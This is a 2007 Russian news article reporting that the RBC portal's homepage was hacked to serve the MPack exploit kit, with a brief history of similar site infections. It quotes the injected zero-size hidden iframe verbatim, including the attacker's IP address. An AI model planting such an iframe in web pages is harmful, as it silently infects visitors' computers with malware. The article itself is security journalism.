Принимаю условия соглашения и даю своё согласие на обработку персональных данных и cookies.

Сайт РБК распространял троян

8 июня 2007, 14:53
Вчера утром в коде главной страницы РБК появился код, с помощью которого злоумышленники устанавливали на компьютер жертвы программу MPack, а она благодаря многочисленным уязвимостям браузера загружала разнообразное вредоносное программное обеспечение.
Опасная "дописка" в коде известного портала выглядела как iframe размером 0х0: < iframe src="http://81.95.150.42/MPack091cbt/index.php" width=0 height=0>. Как сообщает сайт SecurityLab, за небольшой промежуток времени трояном было заражено несколько десятков тысяч пользователей.

РБК взламывается не впервые - в сентябре прошлого года была инфицирована страница top.rbc.ru. Тогда на компьютер жертвы загружался Trojan-PSW.Win32.LdPinch-ayj, который затем отправлял все найденные пароли злоумышленникам.

Заражение сайтов в настоящее время является одним из самых эффективных способов доступа к клиентским компьютерам. У большинства пользователей нет антивирусов для браузеров или же их отключают для экономии ресурсов. При этом напомним, что проблемы с iframe испытывают многие браузеры. Несколько дней назад о подобной проблеме в Firefox писала "Вебпланета".

Кроме того, привычный сайт не таит на первый взгляд никакой опасности. Но он может быть не менее опасен, чем порносайт - ряд вирусов использует сохраненные в FTP-менеджерах пароли и самостоятельно обновляет на веб-сервере все index-файлы, добавляя в них незаметный iframe.

Также сайт может быть подвержен опасности со стороны администраторов хостера. Так в конце прошлого года "Лаборатория Касперского" обнаружила на Valuehost 470 зараженных сайтов.